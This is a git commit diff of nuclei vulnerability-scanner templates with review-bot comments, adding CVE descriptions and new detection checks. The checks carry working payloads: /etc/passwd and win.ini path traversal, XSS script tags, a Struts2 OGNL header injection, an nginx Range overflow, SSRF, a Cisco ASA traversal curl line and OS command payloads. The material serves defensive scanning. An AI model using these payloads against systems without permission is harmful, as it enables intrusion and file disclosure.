commit
747aa48d09
|
@ -4,6 +4,7 @@ info:
|
|||
name: Oracle Content Server XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
|
||||
author: Random-Robbie
|
||||
severity: high
|
||||
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
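Review bot: The name `Node.js 8.5.0 >=< 8.6.0 Directory Traversal` uses an ambiguous range notation; the description on the next lines already states the affected range plainly ("8.5.0 before 8.6.0"), so the name should match it, e.g. `Node.js 8.5.0 (before 8.6.0) Directory Traversal`. The description is otherwise fine and reads like the advisory text, which is what the other templates in this commit do.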
@ -3,6 +3,7 @@ info:
|
|||
author: "Random Robbie"
|
||||
name: "Struts2 RCE "
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
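Review bot: `name: "Struts2 RCE "` carries a trailing space inside the quotes, which will show up in nuclei's output and in any tooling that keys on the name; trim it to `"Struts2 RCE"`. The added description also contains a typographic apostrophe in `attacker’s`; use a plain ASCII `'` so the file stays consistent with the other templates in this commit.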
@ -3,6 +3,7 @@ info:
|
|||
author: "Harsh Bothra"
|
||||
name: "Nginx Remote Integer Overflow"
|
||||
severity: medium
|
||||
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
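Review bot: The added description is hard to read ("vulnerable to integer overflow vulnerability ... resulting into leak"). Suggest: `description: Nginx versions 0.5.6 up to and including 1.13.2 contain an integer overflow in the range filter module that can leak potentially sensitive information when a specially crafted request is received.` Same fact, one sentence, no doubled "vulnerability".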
@ -4,6 +4,7 @@ info:
|
|||
name: Jira IconURIServlet SSRF
|
||||
author: Ice3man
|
||||
severity: high
|
||||
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: CVE-2017-9841
|
||||
author: Random-Robbie
|
||||
severity: High
|
||||
|
||||
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
|
||||
# Reference to exploit
|
||||
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
|
||||
# https://github.com/RandomRobbieBF/phpunit-brute
|
||||
|
|
|
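Review bot: `severity: High` is capitalised while every other template in this commit uses the lowercase form (`high`, `medium`, `critical`); keep the lowercase spelling so severity filtering behaves the same across templates. The added description also lacks a terminating period, and since it is the NVD text it would be worth noting that the template's own paths (in the new-file hunk for this CVE further down) probe the `phpunit` CLI script rather than `eval-stdin.php`, so the description and the check are not describing quite the same thing.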
@ -4,6 +4,7 @@ info:
|
|||
name: Jolokia XSS
|
||||
author: mavericknerd
|
||||
severity: high
|
||||
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Nuxeo Authentication Bypass Remote Code Execution
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
description: Nuxeo Authentication Bypass Remote Code Execution < 103 using a SSTI
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
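Review bot: The added description, `Nuxeo Authentication Bypass Remote Code Execution < 103 using a SSTI`, just repeats the name and the version notation `< 103` is unclear (a reader cannot tell whether this is meant to be "before 10.3" or something else). State the affected version as it appears in the advisory for CVE-2018-16341 and describe the issue in a sentence, e.g. that an unauthenticated request to a crafted login page path reaches a server-side template and evaluates an expression. Also, the description line is placed after a blank line and before `requests:`, unlike the other templates where it sits inside the `info` block directly under `severity`.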
@ -4,6 +4,7 @@ info:
|
|||
name: Wordpress unauthenticated stored xss
|
||||
author: nadino
|
||||
severity: medium
|
||||
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
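Review bot: The name says `unauthenticated stored xss` but the added description says the injection happens "in an authenticated theme-localization.php request to wp-admin/admin.php". One of the two is wrong; if the request really needs a logged-in session, the name and the `severity` should reflect that, and the template should document what credentials it expects. If the endpoint is reachable without authentication, the description should not copy the "authenticated" wording. Also, "Wordpress" is spelled "WordPress" elsewhere in the repository.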
@ -4,6 +4,7 @@ info:
|
|||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
author: madrobot & dwisiswant0
|
||||
severity: high
|
||||
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Atlassian Jira WallboardServlet XSS
|
||||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Oracle WebCenter Sites XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
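Review bot: The added description, `Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware`, says nothing about what the template actually checks. The name calls it XSS and the request in the new-file hunk for CVE-2018-2791 further down in this commit injects a script tag through the `cs_imagedir` parameter of the `Satellite` servlet, so the description should at least say it is a reflected cross-site scripting issue in that component and which parameter is affected. The description line is also placed after a blank line rather than with the other `info` fields.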
@ -4,6 +4,7 @@ info:
|
|||
name: Nexus Repository Manager 3 RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
|
|
|
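Review bot: `auhtor: hetroublemakr` is a typo for `author`; as written the `author` key is absent and nuclei will report this template without an author. Same issue in the next Nexus template. The reference URL lives in a `# reference:` comment; that is consistent with the rest of this commit, but a short description sentence saying the injection is reachable through a specific endpoint would help readers more than "(issue 1 of 2)" from the NVD text.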
@ -4,6 +4,7 @@ info:
|
|||
name: Sonatype Nexus Repository RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
|
|
|
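Review bot: Same `auhtor:` typo as in the previous Nexus template; it needs to be `author:`. Separately, this template reuses the exact reference URL of the previous one (the CVE-2020-10199 article) while its description differs ("an attacker with an administrative account on NXRM"), so please confirm the reference points at the advisory that matches this description rather than the one for the unauthenticated JavaEL issue; if both templates cover the same CVE, say so in the name or description so users do not count them as two findings.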
@ -4,7 +4,7 @@ info:
|
|||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
|
||||
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
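Review bot: The name says `SQLI` while the added description only says "has incorrect access control" (the NVD wording). A one-clause addition to the description stating that the access-control flaw is exercised through an SQL injection in the affected endpoint would make the name and the description agree; as it stands a reader cannot tell from the `info` block what the detection request does.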
@ -4,6 +4,7 @@ info:
|
|||
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
|
||||
|
||||
# This template exploits a Python code injection in the Netsweeper
|
||||
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
||||
|
|
|
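Review bot: The added description says "Netsweeper through 6.4.3 allows unauthenticated remote code execution", while the comment two lines below says the template targets "versions 6.4.4 and" (cut off here). Those version ranges contradict each other; align them with the advisory. The comment also calls this "a Python code injection" and says "This template exploits", while the description talks about injection of shell metacharacters; the other templates in this commit are careful to say "supports the detection part only", so this one should state clearly whether it merely fingerprints the flaw or actually triggers command execution, and what the matcher relies on.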
@ -4,6 +4,7 @@ info:
|
|||
name: Unauthenticated Grafana DoS
|
||||
author: pxmme1337
|
||||
severity: medium
|
||||
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48638
|
||||
# WARNING
|
||||
|
|
|
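Review bot: The name is `Unauthenticated Grafana DoS` but the added description describes an SSRF in the avatar feature ("make Grafana send HTTP requests to any URL and return its result"). Rename to something like `Grafana Unauthenticated Avatar SSRF` so the finding is triaged as the right vulnerability class. The comment block ends with a bare `# WARNING` line; whatever that warning is meant to say (presumably a side effect of the request) should be spelled out, since a warning with no content will be ignored.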
@ -4,6 +4,7 @@ info:
|
|||
name: Artica Web Proxy 4.30 OS Command Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows an authenticated remote attacker
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Artica Web Proxy 4.30 Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows remote attacker to bypass privilege detection
|
||||
|
|
|
@ -15,9 +15,9 @@ info:
|
|||
requests:
|
||||
- payloads:
|
||||
command:
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: IceWarp WebMail XSS
|
||||
author: pdnuclei & dwisiswant0
|
||||
severity: medium
|
||||
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
|
||||
|
||||
# source:- https://www.exploit-db.com/exploits/47988
|
||||
# https://twitter.com/sagaryadav8742/status/1275170967527006208
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache Tomcat RCE by deserialization
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
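Review bot: The added description ends mid-sentence: "... if a) an attacker is able to control the contents and name of a file on the server" with no b), c) or d). Either include the full list of preconditions from the advisory (PersistenceManager with a FileStore, the filter configuration, and so on) or replace it with a short sentence stating that these Tomcat versions can deserialize attacker-controlled session files under specific configuration conditions. As it stands the sentence is incomplete and the single "a)" implies conditions that are not listed.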
@ -4,6 +4,8 @@ info:
|
|||
name: Apache OFBiz XML-RPC Java Deserialization
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
|
||||
|
||||
|
||||
# This temaplte detects a Java deserialization vulnerability in Apache
|
||||
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
|
||||
|
|
|
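Review bot: Two typos here: `# This temaplte detects` should be `template`, and `XML-RPC request are vulnerable` should be `requests are`. More importantly, the description says the unauthenticated `/webtools/control/xmlrpc` endpoint performs unsafe Java deserialization, which is a remote code execution primitive, yet `severity: medium` is lower than what this commit assigns to comparable deserialization and RCE templates (`high` or `critical`); please reconsider the rating or explain in the description why it is limited.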
@ -4,6 +4,7 @@ info:
|
|||
name: SEOmatic < 3.3.0 Server-Side Template Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,16 +5,15 @@ info:
|
|||
severity: high
|
||||
|
||||
requests:
|
||||
|
||||
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
|
||||
# https://github.com/grafana/grafana/issues/14755
|
||||
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
|
||||
# So make sure, not to attempt more than 4 password for same valid user.
|
||||
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
|
||||
# https://github.com/grafana/grafana/issues/14755
|
||||
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
|
||||
# So make sure, not to attempt more than 4 password for same valid user.
|
||||
|
||||
- payloads:
|
||||
|
||||
# grafana_username:
|
||||
# - admin
|
||||
# grafana_username:
|
||||
# - admin
|
||||
|
||||
grafana_password:
|
||||
- prom-operator
|
||||
|
|
|
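Review bot: With `grafana_username` commented out, the only payload list left is `grafana_password` with the single value `prom-operator`, so the request must be hard-coding the username somewhere outside this hunk. The comment block above correctly warns that Grafana locks an account for 5 minutes after 5 invalid attempts, but that limit is per valid user; say in the comment which username the request uses so that anyone extending the password list knows which account the 4-attempt budget applies to. The two reference URLs and the lock-out note appear twice in this rendering because the hunk replaces them; no action needed on that beyond making sure the final file has them once.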
@ -4,6 +4,7 @@ info:
|
|||
name: Security.txt File
|
||||
author: bad5ect0r
|
||||
severity: info
|
||||
description: The website defines a security policy.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2017-10075
|
||||
|
||||
info:
|
||||
name: Oracle Content Server XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(31337)</script>"
|
||||
part: body
|
|
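Review bot: This new copy of `CVE-2017-10075` has no `description` in its `info` block, while the modification hunk at the top of this commit adds one to the other copy of the same template; keep the two in sync so whichever directory users run from reports the same metadata. The two paths differ only in which parameter carries the script tag (`ResultsTitle` versus `PageTitle`), and the matcher requires both status 200 and the unencoded `<script>alert(31337)</script>` in the body, which is a reasonable reflection check.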
@ -0,0 +1,20 @@
|
|||
id: CVE-2017-14849
|
||||
|
||||
info:
|
||||
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
|
||||
author: Random-Robbie
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
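Review bot: Like the previous new file, this copy lacks the `description` that the corresponding modification hunk adds for CVE-2017-14849; keep both copies identical. On the matcher, `root:[x*]:0:0:` is a character class, so it matches exactly `root:x:0:0:` or `root:*:0:0:`; that covers the usual shadow-password placeholder and a locked root entry, which is fine for `/etc/passwd`, but it is worth a comment since the same regex is copied into several templates in this commit and a reader may misread `[x*]` as "x followed by anything".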
@ -0,0 +1,29 @@
|
|||
id: CVE-2017-5638
|
||||
info:
|
||||
author: "Random Robbie"
|
||||
name: "Struts2 RCE "
|
||||
severity: critical
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# Exploit:- https://github.com/mazen160/struts-pwn
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||||
Accept-Language: en
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||||
Connection: Keep-Alive
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
||||
Pragma: no-cache
|
||||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Bounty Plz"
|
||||
part: header
|
|
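Review bot: The `info` block here orders `author` before `name`, unlike every other template in this commit, and the name still has the trailing space (`"Struts2 RCE "`). The detection itself is a response-header injection through the `Content-Type` expression and the matcher looks for the injected `Bounty Plz` value in `part: header`, which is a sound low-impact check; adding a `matchers-condition: and` with a status matcher is not required for a single matcher, but the `# Exploit:-` link in a template whose comment says "detection part only" should be labelled as a reference rather than as the exploit to run.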
@ -0,0 +1,29 @@
|
|||
id: CVE-2017-7529
|
||||
info:
|
||||
author: "Harsh Bothra"
|
||||
name: "Nginx Remote Integer Overflow"
|
||||
severity: medium
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Range: bytes=-17208,-9223372036854758792
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 206
|
||||
- type: word
|
||||
words:
|
||||
- Content-Range
|
||||
part: all
|
|
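Review bot: The matcher combination (status `206` and the word `Content-Range` in `part: all`) will also fire on servers that are not nginx: any server that honours a suffix range for a body larger than 17208 bytes answers the two-range request with 206 and `Content-Range` headers in the multipart body, regardless of whether the overflow exists. To cut false positives, pair this with a check that the target is nginx (for example a word matcher on the `Server` header) or with the `multipart/byteranges` content type plus a version fingerprint, and say in a comment why a 206 alone is not proof. The `Range` value itself and the referenced script are fine to keep as-is for the detection case.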
@ -0,0 +1,16 @@
|
|||
id: CVE-2017-9506
|
||||
|
||||
info:
|
||||
name: Jira IconURIServlet SSRF
|
||||
author: Ice3man
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ipinfo.io/missingauth"
|
||||
part: body
|
|
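Review bot: The check depends on a third-party service: the request points `consumerUri` at `https://ipinfo.io/json` and the matcher expects the literal `ipinfo.io/missingauth` in the body. If ipinfo.io changes its unauthenticated response, or the target cannot reach the internet, the template silently reports "not vulnerable" even on an unpatched instance. Prefer a callback host the scan operator controls, or at least document this dependency in a comment so a negative result is not taken as a clean bill of health; there is also no status matcher, so a redirect page that happens to echo the string would match.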
@ -0,0 +1,36 @@
|
|||
id: CVE-2017-9841
|
||||
|
||||
info:
|
||||
name: CVE-2017-9841
|
||||
author: Random-Robbie
|
||||
severity: High
|
||||
|
||||
# Reference to exploit
|
||||
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
|
||||
# https://github.com/RandomRobbieBF/phpunit-brute
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/laravel_api/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/api/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/apps/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/backup/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/oldsite/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/lib/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/modules/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/old/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/zend/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/yii/vendor/phpunit/phpunit/phpunit"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "this version of phpunit requires php 5"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
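Review bot: Three things in the `info` and matcher blocks. `severity: High` should be lowercase like the other templates. `name: CVE-2017-9841` just repeats the `id`; give it a descriptive name such as `PHPUnit eval-stdin.php exposed vendor directory`. And the word matcher is `this version of phpunit requires php 5`, all lowercase, whereas the banner the `phpunit` script prints is capitalised ("This version of PHPUnit requires PHP ..."); unless nuclei lowercases the body before word matching, this matcher never fires, so either fix the casing or verify the matcher against a real response. Note also that the paths probe the CLI script, not `eval-stdin.php`, so a hit means an exposed vendor directory rather than a confirmed code-execution path.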
@ -0,0 +1,23 @@
|
|||
id: CVE-2018-0296
|
||||
|
||||
info:
|
||||
name: Cisco ASA path traversal vulnerability
|
||||
author: organiccrap
|
||||
severity: medium
|
||||
# https://github.com/yassineaboukir/CVE-2018-0296
|
||||
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
|
||||
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "///sessions"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-1000129
|
||||
|
||||
info:
|
||||
name: Jolokia XSS
|
||||
author: mavericknerd
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
|
||||
- "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
|
||||
- "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
|
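Review bot: The third path, `{{BaseURL}}:8080/jolokia/...`, appends a port to `BaseURL`; when the target URL already carries a port or a path prefix (for example `https://host:8443/app`) this produces an invalid URL such as `https://host:8443/app:8080/jolokia/...`, and nuclei will either fail the request or send it somewhere unintended. Either drop that entry and let users supply `host:8080` as a target, or build the URL from the hostname variable rather than from `BaseURL`. The same pattern appears in the Crowd template later in this commit.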
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-11409
|
||||
|
||||
info:
|
||||
name: Splunk Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
|
||||
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- licenseKeys
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2018-11759
|
||||
|
||||
info:
|
||||
name: Apache Tomcat JK Status Manager Access
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# Source:- https://github.com/immunIT/CVE-2018-11759
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/jkstatus'
|
||||
- '{{BaseURL}}/jkstatus;'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "JK Status Manager"
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-1247
|
||||
|
||||
info:
|
||||
name: RSA Authentication Manager XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-shockwave-flash"
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "javascript:alert(1337)"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2018-1271
|
||||
|
||||
info:
|
||||
name: Spring MVC Directory Traversal Vulnerability
|
||||
author: hetroublemakr
|
||||
severity: High
|
||||
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||
- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
- type: status
|
||||
